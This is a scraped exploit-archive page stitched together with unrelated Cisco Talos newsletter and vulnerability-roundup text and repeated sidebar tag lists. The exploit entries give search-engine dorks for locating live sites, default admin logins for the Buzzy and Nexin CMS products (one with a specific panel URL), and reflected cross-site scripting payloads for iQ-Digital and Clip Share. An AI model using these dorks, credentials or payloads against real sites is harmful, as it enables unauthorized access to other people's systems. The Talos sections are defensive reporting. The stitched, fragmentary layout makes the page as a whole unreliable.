    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings

Last week, the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S.’s critical infrastructure security (and more).

Thursday, July 20, 2023 14:07

Welcome to this week’s edition of the Threat Source newsletter.

Last week, the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S.’s critical infrastructure security (and more).

The roadmap goes a long way toward actualizing a plan the administration released earlier this year and sets tangible goals and programs to put many of these initiatives into action. But because nothing ever moves quickly in government, this roadmap and the associated plan are already hitting a few roadblocks.

First, there’s the ever-present partisan politics. Republican state lawmakers are backing a legal challenge in the court systems to block an Environmental Protection Administration rule that asked local water systems to evaluate their current cybersecurity systems and protections while conducting sanitation surveys. To me, simply asking critical infrastructure to consider these factors as part of their normal processes seems like a non-issue, but the U.S. Appeals Court has put a hold on this rule for the time being (though it didn’t give a precise reason at the time of its ruling).

If lawmakers are going to hash these types of regulations in court every time something new pops up, we’ll never reach the point of these rules actually being implemented.

Two leading Republican members of the U.S. House came out hours after the Biden administration released the roadmap, saying they would use their respective House panels to, “exercise strict oversight on CISA’s efforts” to implement many of the policies outlined.

Regardless of which side of the political spectrum you fall, cybersecurity should be something our lawmakers can all agree on.

Say these arguments extend through the 2024 election — what happens if control of the White House or Congress switches between parties? And then that changes again in 2026? Change is slow, so none of these initiatives are going to be implemented overnight.

If our government can’t come to any sort of agreement about the importance of cybersecurity, and how to encourage stronger public-private partnerships to reach the country’s goals, this is just going to be another partisan issue that’s held up by legal challenges, budget negotiations, hearings and verbal discourse. And by the time that all subsides, the people in charge of outlining and implementing these cybersecurity goals could have very well changed.

So, forgive me if I’m coming off as a bit skeptical that anything in this roadmap will end up passing any mile markers.

**The one big thing**

Our researchers recently discovered a threat actor conducting several campaigns against government entities, military organizations and civilian users in Ukraine and Poland. Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access. The activity we analyzed occurred as early as April 2022 and as recently as earlier this month, demonstrating the persistent nature of the threat actor. The final payloads include the AgentTesla remote access trojan (RAT), Cobalt Strike beacons and njRAT.

**Why do I care?**

If you’re a user in Ukraine or Poland, especially someone working in the government or military sectors, this is a clear-cut example of a spam campaign targeting this population. For those who fall outside of that demographic, it’s interesting that this group is still relying on the user enabling macros in Office, since Microsoft disabled those by default earlier this year. These are also highly targeted emails with (relatively speaking) convincing lures, so whoever is behind these is not to be ignored.

**So now what?**

There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns. Other Snort rules and detection content can prevent the execution of the malware used as the final payload. Our researchers have also published examples of the types of lure images and documents used in the initial phishing emails so users can know what to be on the lookout for.

**Top security headlines of the week**

**Chinese state-sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies,** including the State Department. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a detailed timeline on the campaign, stating that an investigation from Microsoft revealed that “advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data” after users reported suspicious activities in their Microsoft 365 cloud environment. While the full scope of the hack is still under investigation, reports indicate that the actors were primarily trying to steal sensitive information. While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited, the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users. “Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse,” the report states. (CISA, CNN)

Popular tax preparation software companies are under fire from lawmakers for **allegedly sharing personal information with social media sites, including Google and Meta.** Several Democratic lawmakers released a report last week that accused TaxAct, H&R Block and TaxSlayer of embedding Meta and Google’s tracking pixels on their sites, potentially violating U.S. law and sharing taxpayers’ information with those companies. The report says the data was kept anonymous, but the companies could “easily” use the information to identify individuals or create targeted advertising for them. The report has also renewed calls for the Internal Revenue Service to offer its own, free online tax filing service for U.S. consumers. (Vox, USA Today)

**Apple had to roll back and then re-release a security update** that addressed an actively exploited vulnerability in WebKit. Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023-37450, a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use. However, users reported that the fix was causing Safari to not connect correctly to major websites like Facebook, Instagram and Zoom, leading Apple to pull back the patch. Since then, Apple released a new fix for iOS, iPadOS and macOS that reliably fixes the vulnerability again. Though few details are currently available about CVE-2023-37450, Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content. (Forbes, Gizmodo)

**Can’t get enough Talos?**

*   Vulnerability Roundup: Memory corruption vulnerability in Microsoft Edge; MilesightVPN and router could be taken over
*   Malicious Microsoft Drivers Could Number in the Thousands: Cisco Talos
*   New Threat Actor Launches Cyber-attacks on Ukraine and Poland
*   Uncovering weaknesses in Apple macOS and VMWare vCenter: 12 vulnerabilities in RPC implementation
*   The Need to Know: Why are there so many malware-as-a-service offerings?
*   Implementing an ISO-compliant threat intelligence program
*   Talos Takes Ep. #147: The dangers of "Mercenary" groups and the spyware they create

**Upcoming events where you can find Talos**

**BlackHat (Aug. 5 - 10)**

Las Vegas, Nevada

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

_**“Most prevalent malware files” is taking a break this week for maintenance.**_

The federal government’s cybersecurity policies are falling into place just in time to be stalled again

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

Posted Jul 20, 2023

Authored by indoushka

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | e614477d10fc119020f0bb6bfcef55d3cf59f2217502dd441fe065c9b47251c1

Download | Favorite | View

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS Nexin Adminisztrációs Központ v1.2 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : Nexin Adminisztrációs Központ v1.2                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://discocenterhu/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings

CMS iQ-Digital version 2.0 suffers from a cross site scripting vulnerability.

**CMS iQ-Digital 2.0 Cross Site Scripting**

Posted Jul 20, 2023

Authored by indoushka

CMS iQ-Digital version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3320c1901d54ffd35aac7dcb03095b447934214a707ed6d7ebb3179839c2a7c6

Download | Favorite | View

**CMS iQ-Digital 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMS iQ-Digital v2.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://iq-medya.net.tr                                                                                            |  | # Dork      : intext:''Tasarım iQ Digital''                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /tr/blog.php?page=<script>alert(/indoushka/);</script>[+]  http://127.0.0.1/uzmangayrimenkulcomtr/tr/blog.php?page=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS iQ-Digital 2.0 Cross Site Scripting

In all, Talos released 22 security advisories regarding Milesight products this month, nine of which have a CVSS score greater than 8, associated with 69 CVEs.

Wednesday, July 19, 2023 11:07

Since the beginning of July, Cisco Talos has published 40 vulnerability advisories affecting a range of software and hardware, including the Microsoft Edge browser.

In our new series called “Vulnerability Roundup,” we’ll be recapping the vulnerabilities we recently disclosed to provide readers with an overview of what the issue is, how they can remediate and what the potential implications are for users. Our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

**Microsoft Edge memory corruption (TALOS-2023-1747/CVE-2023-36887)**

A memory corruption vulnerability exists in the JavaScript implementation of the Adobe Acrobat PDF engine that the Microsoft Edge web browser uses. Talos tested and confirmed that Edge, versions 112.0.1722.58 and 114.0.1776.0 Canary, are affected by this vulnerability.

An attacker could trigger this vulnerability by tricking a user into opening a specially crafted PDF in the browser. This could trigger a type confusion vulnerability, which could allow the adversary to write to arbitrary memory. Microsoft patched this issue on July 13.

The following Snort rules will detect exploitation attempts of this vulnerability: 61874 and 61875. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall or Snort.org.

**Multiple vulnerabilities in Milesight UR32L router and MilesightVPN**

Talos disclosed multiple vulnerabilities in these products despite no official fix from Milesight, in adherence to Cisco’s vulnerability disclosure policy. Milesight did not respond appropriately during the 90-day period as outlined in the policy.

We have a complete technical breakdown of how an attacker could string some of these vulnerabilities together to completely compromise the UR32L router and MilesightVPN.

In all, Talos released 22 security advisories regarding Milesight products this month, nine of which have a CVSS score greater than 8, associated with 69 CVEs.

**Heap buffer overflow vulnerabilities in Diagon text translator**

Our researchers discovered two vulnerabilities in the Diagon text interpreter that could cause heap-based buffer overflow conditions. Diagon translates Markdown into several formats, including latex, planar graph and tables.

The Diagon interpreter translates a Markdown text sequence diagram to a graphical sequence diagram.

An adversary could exploit TALOS-2023-1745 (CVE-2023-31194) by sending a specially crafted network request to the targeted device, thereby causing a write access violation. TALOS-2023-1744 (CVE-2023-27390) could be exploited the same way, but in this case, leads directly to the heap-based buffer overflow. Diagon’s maintainer released an update to address these vulnerabilities.

Memory corruption vulnerability in Microsoft Edge; MilesightVPN and router could be taken over

Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.

**Clip Share 4.1.4 Cross Site Scripting**

Posted Jul 19, 2023

Authored by indoushka

Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | f104b1e9de39e7d0bb70da284aab85d83380acd95357f1cdeaf43197d30dc724

Download | Favorite | View

**Clip Share 4.1.4 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Clip Share 4.1.4 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.clip-share.com/                                                                                         || # Dork      : Powered By ClipShare                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Xss :   This vulnerability affects /ClipShare/signup.    URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="   The input is reflected inside a tag parameter between double quotes.   URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="   The input is reflected inside a tag parameter between double quotes.Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,696)
*   Arbitrary (16,150)
*   BBS (2,859)
*   Bypass (1,732)
*   CGI (1,025)
*   Code Execution (7,233)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,342)
*   Encryption (2,365)
*   Exploit (51,589)
*   File Inclusion (4,207)
*   File Upload (963)
*   Firewall (821)
*   Info Disclosure (2,752)
*   Intrusion Detection (890)
*   Java (3,009)
*   JavaScript (851)
*   Kernel (6,639)
*   Local (14,427)
*   Magazine (586)
*   Overflow (12,638)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,649)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,635)
*   Security Tool (7,873)
*   Shell (3,172)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,195)
*   SQL Injection (16,299)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,691)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,849)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,792)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,198)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,565)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,751)
*   UNIX (9,266)
*   UnixWare (186)
*   Windows (6,562)
*   Other

Tag

#cisco